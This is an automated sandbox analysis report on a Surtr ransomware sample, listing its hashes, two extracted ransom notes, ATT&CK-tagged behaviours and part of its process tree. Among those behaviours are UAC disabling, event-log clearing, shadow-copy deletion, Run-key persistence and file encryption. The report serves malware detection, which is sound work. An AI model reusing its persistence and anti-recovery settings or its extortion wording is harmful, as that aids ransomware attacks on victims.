surtr | 8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980

Resubmissions

01-11-2022 14:02

221101-rckx8sddcn 10

24-12-2021 07:08

211224-hx8qcscee3 10

Analysis

max time kernel
128s
max time network
124s
platform
windows7_x64
resource
win7-en-20211208
submitted
24-12-2021 07:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

surtr.exe
Size

320KB
MD5

e6fc190168519d6a6c4f1519e9450f0f
SHA1

af2080ddf1064fb80c7b9af942aaabf264441098
SHA256

8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
SHA512

4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba

Score

10^/10

surtr evasion persistence ransomware spyware stealer trojan upx

Malware Config

Extracted

Path

C:\ProgramData\Service\SURTR_README.txt

Ransom Note

What happened to your files? Unfortunately, your server was compromised, using a security hole in your server. All your files are encrypted with a military algorithm . in order to contact us you can email this address [email protected] use this ID( Mg7XhdqAg5vABo ) for the title of your email. if you weren't able to contact us within 24 hours please email : [email protected] Only we can decrypt your files. Please do not contact separate fraudulent sites. You can use freeand even paid software on the Internet, but it is uselessand will cause you to lose filesand timeand money.

Emails

[email protected]

Extracted

Path

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta

Family

surtr

Ransom Note

SurtrRansomware OOPS ALL YOUR IMPORTANT FILES HAVE BEEN ENCRYPTED AND STOLEN !! Notice : There is only one way to restore your data read the boxes carefully! Attention : Do Not change file names. Do Not try to decrypt using third party softwares , it may cause permanent data loss . If you do not pay the fee within one month , your important files will be published in our public belog . Do not pay any money before decrypting the test files. You can use our 50% discount if you pay the fee within first 15 days of encryption . otherwise the price will be doubled. In order to warranty you , our team will decrypt 3 of your desired files for free.but you need to pay the specified price for the rest of the operation . How To Decrypt : Your system is offline . in order to contact us you can email this address [email protected] use this ID (Mg7XhdqAg5vABo) for the title of your email . If you weren't able to contact us within 24 hours please email : [email protected] If you didn't get any respond within 48 hours use this link (Not Available Now).send your ID and your cryptor name (SurtrRansomwareUserName) therefore we can create another way to contact you as soon as possible

Emails

[email protected]

Signatures

Detects Surtr Payload 2 IoCs

resource	yara_rule
behavioral1/memory/956-60-0x0000000140133F50-mapping.dmp	family_surtr
behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp	family_surtr

Surtr
Ransomware family first seen in late 2021.
ransomware surtr

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
2844	wevtutil.exe
1364	wevtutil.exe
2748	Process not Found
3644	wevtutil.exe
1064	wevtutil.exe
3464	wevtutil.exe
3768	wevtutil.exe
4080	Process not Found
3484	Process not Found
3448	wevtutil.exe
3684	wevtutil.exe
2940	Process not Found
3252	Process not Found
3504	Process not Found
3836	Process not Found
1056	wevtutil.exe
3128	wevtutil.exe
2092	wevtutil.exe
2508	wevtutil.exe
3824	wevtutil.exe
3824	wevtutil.exe
3180	wevtutil.exe
2548	wevtutil.exe
812	Process not Found
2616	Process not Found
1608	wevtutil.exe
4092	wevtutil.exe
2132	wevtutil.exe
2764	wevtutil.exe
1588	Process not Found
3720	wevtutil.exe
1752	Process not Found
4040	Process not Found
3108	Process not Found
3104	wevtutil.exe
468	wevtutil.exe
1928	wevtutil.exe
4052	Process not Found
1532	Process not Found
2260	Process not Found
852	wevtutil.exe
3296	Process not Found
1016	wevtutil.exe
3628	Process not Found
3080	Process not Found
1676	wevtutil.exe
2468	wevtutil.exe
3964	wevtutil.exe
3640	wevtutil.exe
2892	Process not Found
3200	wevtutil.exe
3240	Process not Found
1860	wevtutil.exe
2040	wevtutil.exe
2056	wevtutil.exe
3676	wevtutil.exe
3208	Process not Found
2900	Process not Found
2832	Process not Found
3260	Process not Found
1928	Process not Found
3384	wevtutil.exe
3852	wevtutil.exe
2188	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
3680	bcdedit.exe
3760	bcdedit.exe

Blocklisted process makes network request 5 IoCs

flow	pid	Process
6	3568	Process not Found
7	3568	Process not Found
9	3568	Process not Found
11	3568	Process not Found
13	3568	Process not Found

Disables Task Manager via registry modification
evasion
Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

UPX packed file 5 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/956-56-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-58-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-59-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-62-0x0000000140000000-0x0000000140136000-memory.dmp	upx
behavioral1/memory/956-61-0x0000000140000000-0x0000000140136000-memory.dmp	upx

Drops startup file 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt	cmd.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe	Process not Found
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta	cmd.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 8 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Enumerates connected drives 3 TTPs 49 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	vssadmin.exe
File opened (read-only)	\??\Q:	vssadmin.exe
File opened (read-only)	\??\Y:	vssadmin.exe
File opened (read-only)	\??\K:	surtr.exe
File opened (read-only)	\??\W:	surtr.exe
File opened (read-only)	\??\V:	vssadmin.exe
File opened (read-only)	\??\T:	vssadmin.exe
File opened (read-only)	\??\J:	vssadmin.exe
File opened (read-only)	\??\Q:	surtr.exe
File opened (read-only)	\??\X:	surtr.exe
File opened (read-only)	\??\N:	vssadmin.exe
File opened (read-only)	\??\H:	vssadmin.exe
File opened (read-only)	\??\S:	vssadmin.exe
File opened (read-only)	\??\Z:	surtr.exe
File opened (read-only)	\??\F:	vssadmin.exe
File opened (read-only)	\??\N:	surtr.exe
File opened (read-only)	\??\O:	surtr.exe
File opened (read-only)	\??\K:	vssadmin.exe
File opened (read-only)	\??\M:	vssadmin.exe
File opened (read-only)	\??\G:	vssadmin.exe
File opened (read-only)	\??\Y:	surtr.exe
File opened (read-only)	\??\B:	surtr.exe
File opened (read-only)	\??\E:	vssadmin.exe
File opened (read-only)	\??\U:	vssadmin.exe
File opened (read-only)	\??\L:	vssadmin.exe
File opened (read-only)	\??\L:	surtr.exe
File opened (read-only)	\??\P:	surtr.exe
File opened (read-only)	\??\R:	surtr.exe
File opened (read-only)	\??\T:	surtr.exe
File opened (read-only)	\??\V:	surtr.exe
File opened (read-only)	\??\Z:	vssadmin.exe
File opened (read-only)	\??\X:	vssadmin.exe
File opened (read-only)	\??\I:	surtr.exe
File opened (read-only)	\??\E:	surtr.exe
File opened (read-only)	\??\S:	surtr.exe
File opened (read-only)	\??\P:	vssadmin.exe
File opened (read-only)	\??\B:	vssadmin.exe
File opened (read-only)	\??\I:	vssadmin.exe
File opened (read-only)	\??\U:	surtr.exe
File opened (read-only)	\??\W:	vssadmin.exe
File opened (read-only)	\??\G:	surtr.exe
File opened (read-only)	\??\H:	surtr.exe
File opened (read-only)	\??\F:	surtr.exe
File opened (read-only)	\??\J:	surtr.exe
File opened (read-only)	\??\M:	surtr.exe
File opened (read-only)	\??\A:	surtr.exe
File opened (read-only)	\??\R:	vssadmin.exe
File opened (read-only)	\??\A:	vssadmin.exe
File opened (read-only)	\??\O:	vssadmin.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg"	surtr.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1448 set thread context of 956	1448	surtr.exe	28

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_rainy.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\nb.txt.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\NavigationUp_SelectionSubpicture.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\highlight.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\core_visualvm.jar.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\glass_lrg.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Sydney.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Microsoft Games\Hearts\desktop.ini.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_pl.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01064_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NL7MODELS0009.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0287645.JPG.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21336_.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\License.txt.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR\TipTsf.dll.mui.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yellowknife.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\bin\jfxmedia.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\microsoft shared\VSTA\Pipeline.v10.0\Contracts\Microsoft.VisualStudio.Tools.Office.Contract.v10.0.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\msdarem.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR17F.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\video_filter\librotate_plugin.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\ja-JP\msdaprsr.dll.mui.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01181_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Templates\1033\ONENOTE\14\Stationery\PLANNERS.ONE.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Barbados.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Etc\UTC.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Media Player\Media Renderer\RenderingControl.xml.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099164.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_Groove.gif.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\ECLIPSE_.SF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Bougainville.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\msdasql.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_hu.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00669_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0186346.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BANNER.XML.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\security\javafx.policy.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\curl.png.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0101865.BMP.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Biscay\TAB_ON.GIF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\NAVBAR11.POC.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\mshwgst.dll.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\ConvertToUnpublish.pps.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\js\library.js.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\Ole DB\en-US\sqlxmlx.rll.mui.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.DOC.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\NPAUTHZ.DLL.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\Places\ALARM.WAV.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsBlankPage.html.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSPST32.DLL.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\library.js.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL104.XML.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\cpu.js.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\7-Zip\Lang\id.txt.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\America\Maceio.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01069_.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0196400.WMF.[[email protected]].SURT	surtr.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PROTTPLN.PPT.[[email protected]].SURT	surtr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
520	Process not Found
2704	schtasks.exe
3620	schtasks.exe

Interacts with shadow copies 2 TTPs 27 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
2364	vssadmin.exe
2372	vssadmin.exe
2468	vssadmin.exe
2084	vssadmin.exe
2168	vssadmin.exe
2180	vssadmin.exe
2060	vssadmin.exe
2092	vssadmin.exe
2152	vssadmin.exe
2188	vssadmin.exe
2504	vssadmin.exe
1676	vssadmin.exe
2104	vssadmin.exe
2128	vssadmin.exe
2052	vssadmin.exe
888	vssadmin.exe
2332	vssadmin.exe
2112	vssadmin.exe
2140	vssadmin.exe
2412	vssadmin.exe
2204	vssadmin.exe
2380	vssadmin.exe
2480	vssadmin.exe
2488	vssadmin.exe
520	vssadmin.exe
1108	vssadmin.exe
2120	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main	Process not Found

Modifies registry class 5 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.surt\ = "surt_auto_file"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file\DefaultIcon	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\surt_auto_file	Process not Found

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3540	Process not Found

Runs net.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
956	surtr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeBackupPrivilege	2680	vssvc.exe
Token: SeRestorePrivilege	2680	vssvc.exe
Token: SeAuditPrivilege	2680	vssvc.exe
Token: SeSecurityPrivilege	4092	wevtutil.exe
Token: SeBackupPrivilege	4092	wevtutil.exe
Token: SeSecurityPrivilege	2360	wevtutil.exe
Token: SeBackupPrivilege	2360	wevtutil.exe
Token: SeSecurityPrivilege	2816	wevtutil.exe
Token: SeBackupPrivilege	2816	wevtutil.exe
Token: SeSecurityPrivilege	3220	wevtutil.exe
Token: SeBackupPrivilege	3220	wevtutil.exe
Token: SeSecurityPrivilege	2364	wevtutil.exe
Token: SeBackupPrivilege	2364	wevtutil.exe
Token: SeSecurityPrivilege	1608	wevtutil.exe
Token: SeBackupPrivilege	1608	wevtutil.exe
Token: SeSecurityPrivilege	2264	wevtutil.exe
Token: SeBackupPrivilege	2264	wevtutil.exe
Token: SeSecurityPrivilege	2392	wevtutil.exe
Token: SeBackupPrivilege	2392	wevtutil.exe
Token: SeSecurityPrivilege	2416	wevtutil.exe
Token: SeBackupPrivilege	2416	wevtutil.exe
Token: SeSecurityPrivilege	3376	wevtutil.exe
Token: SeBackupPrivilege	3376	wevtutil.exe
Token: SeSecurityPrivilege	3424	wevtutil.exe
Token: SeBackupPrivilege	3424	wevtutil.exe
Token: SeSecurityPrivilege	612	wevtutil.exe
Token: SeBackupPrivilege	612	wevtutil.exe
Token: SeSecurityPrivilege	1860	wevtutil.exe
Token: SeBackupPrivilege	1860	wevtutil.exe
Token: SeSecurityPrivilege	1280	wevtutil.exe
Token: SeBackupPrivilege	1280	wevtutil.exe
Token: SeSecurityPrivilege	2280	wevtutil.exe
Token: SeBackupPrivilege	2280	wevtutil.exe
Token: SeSecurityPrivilege	1640	wevtutil.exe
Token: SeBackupPrivilege	1640	wevtutil.exe
Token: SeSecurityPrivilege	1684	wevtutil.exe
Token: SeBackupPrivilege	1684	wevtutil.exe
Token: SeSecurityPrivilege	3324	wevtutil.exe
Token: SeBackupPrivilege	3324	wevtutil.exe
Token: SeSecurityPrivilege	3508	wevtutil.exe
Token: SeBackupPrivilege	3508	wevtutil.exe
Token: SeSecurityPrivilege	3532	wevtutil.exe
Token: SeBackupPrivilege	3532	wevtutil.exe
Token: SeSecurityPrivilege	3516	wevtutil.exe
Token: SeBackupPrivilege	3516	wevtutil.exe
Token: SeSecurityPrivilege	3548	wevtutil.exe
Token: SeBackupPrivilege	3548	wevtutil.exe
Token: SeSecurityPrivilege	3364	wevtutil.exe
Token: SeBackupPrivilege	3364	wevtutil.exe
Token: SeSecurityPrivilege	3576	wevtutil.exe
Token: SeBackupPrivilege	3576	wevtutil.exe
Token: SeSecurityPrivilege	3564	wevtutil.exe
Token: SeBackupPrivilege	3564	wevtutil.exe
Token: SeSecurityPrivilege	3644	wevtutil.exe
Token: SeBackupPrivilege	3644	wevtutil.exe
Token: SeSecurityPrivilege	3628	wevtutil.exe
Token: SeBackupPrivilege	3628	wevtutil.exe
Token: SeSecurityPrivilege	3720	wevtutil.exe
Token: SeBackupPrivilege	3720	wevtutil.exe
Token: SeSecurityPrivilege	3824	wevtutil.exe
Token: SeBackupPrivilege	3824	wevtutil.exe
Token: SeSecurityPrivilege	3800	wevtutil.exe
Token: SeBackupPrivilege	3800	wevtutil.exe
Token: SeSecurityPrivilege	3840	wevtutil.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 1448 wrote to memory of 956	1448	surtr.exe	28
PID 956 wrote to memory of 468	956	surtr.exe	29
PID 956 wrote to memory of 468	956	surtr.exe	29
PID 956 wrote to memory of 468	956	surtr.exe	29
PID 956 wrote to memory of 524	956	surtr.exe	30
PID 956 wrote to memory of 524	956	surtr.exe	30
PID 956 wrote to memory of 524	956	surtr.exe	30
PID 956 wrote to memory of 360	956	surtr.exe	31
PID 956 wrote to memory of 360	956	surtr.exe	31
PID 956 wrote to memory of 360	956	surtr.exe	31
PID 360 wrote to memory of 736	360	cmd.exe	32
PID 360 wrote to memory of 736	360	cmd.exe	32
PID 360 wrote to memory of 736	360	cmd.exe	32
PID 956 wrote to memory of 1228	956	surtr.exe	60
PID 956 wrote to memory of 1228	956	surtr.exe	60
PID 956 wrote to memory of 1228	956	surtr.exe	60
PID 956 wrote to memory of 1784	956	surtr.exe	59
PID 956 wrote to memory of 1784	956	surtr.exe	59
PID 956 wrote to memory of 1784	956	surtr.exe	59
PID 956 wrote to memory of 1356	956	surtr.exe	58
PID 956 wrote to memory of 1356	956	surtr.exe	58
PID 956 wrote to memory of 1356	956	surtr.exe	58
PID 956 wrote to memory of 1812	956	surtr.exe	57
PID 956 wrote to memory of 1812	956	surtr.exe	57
PID 956 wrote to memory of 1812	956	surtr.exe	57
PID 956 wrote to memory of 416	956	surtr.exe	56
PID 956 wrote to memory of 416	956	surtr.exe	56
PID 956 wrote to memory of 416	956	surtr.exe	56
PID 956 wrote to memory of 1640	956	surtr.exe	55
PID 956 wrote to memory of 1640	956	surtr.exe	55
PID 956 wrote to memory of 1640	956	surtr.exe	55
PID 956 wrote to memory of 1468	956	surtr.exe	54
PID 956 wrote to memory of 1468	956	surtr.exe	54
PID 956 wrote to memory of 1468	956	surtr.exe	54
PID 956 wrote to memory of 1484	956	surtr.exe	53
PID 956 wrote to memory of 1484	956	surtr.exe	53
PID 956 wrote to memory of 1484	956	surtr.exe	53
PID 956 wrote to memory of 1476	956	surtr.exe	51
PID 956 wrote to memory of 1476	956	surtr.exe	51
PID 956 wrote to memory of 1476	956	surtr.exe	51
PID 956 wrote to memory of 1860	956	surtr.exe	52
PID 956 wrote to memory of 1860	956	surtr.exe	52
PID 956 wrote to memory of 1860	956	surtr.exe	52
PID 956 wrote to memory of 1500	956	surtr.exe	50
PID 956 wrote to memory of 1500	956	surtr.exe	50
PID 956 wrote to memory of 1500	956	surtr.exe	50
PID 956 wrote to memory of 1200	956	surtr.exe	49
PID 956 wrote to memory of 1200	956	surtr.exe	49
PID 956 wrote to memory of 1200	956	surtr.exe	49
PID 956 wrote to memory of 1824	956	surtr.exe	46
PID 956 wrote to memory of 1824	956	surtr.exe	46
PID 956 wrote to memory of 1824	956	surtr.exe	46
PID 956 wrote to memory of 992	956	surtr.exe	48
PID 956 wrote to memory of 992	956	surtr.exe	48
PID 956 wrote to memory of 992	956	surtr.exe	48
PID 956 wrote to memory of 1736	956	surtr.exe	45
PID 956 wrote to memory of 1736	956	surtr.exe	45
PID 956 wrote to memory of 1736	956	surtr.exe	45

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
2372	Process not Found
1640	Process not Found
1828	Process not Found
3476	Process not Found
1924	Process not Found
212	Process not Found
2504	attrib.exe
1524	attrib.exe

C:\Users\Admin\AppData\Local\Temp\surtr.exe
"C:\Users\Admin\AppData\Local\Temp\surtr.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1448
- C:\Users\Admin\AppData\Local\Temp\surtr.exe
  "C:\Users\Admin\AppData\Local\Temp\surtr.exe"
  2⤵
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service
    3⤵
    PID:468
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c echo off
    3⤵
    PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c chcp 437
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:360
  - - C:\Windows\system32\chcp.com
      chcp 437
      4⤵
      PID:736
- - C:\Windows\system32\cmd.exe
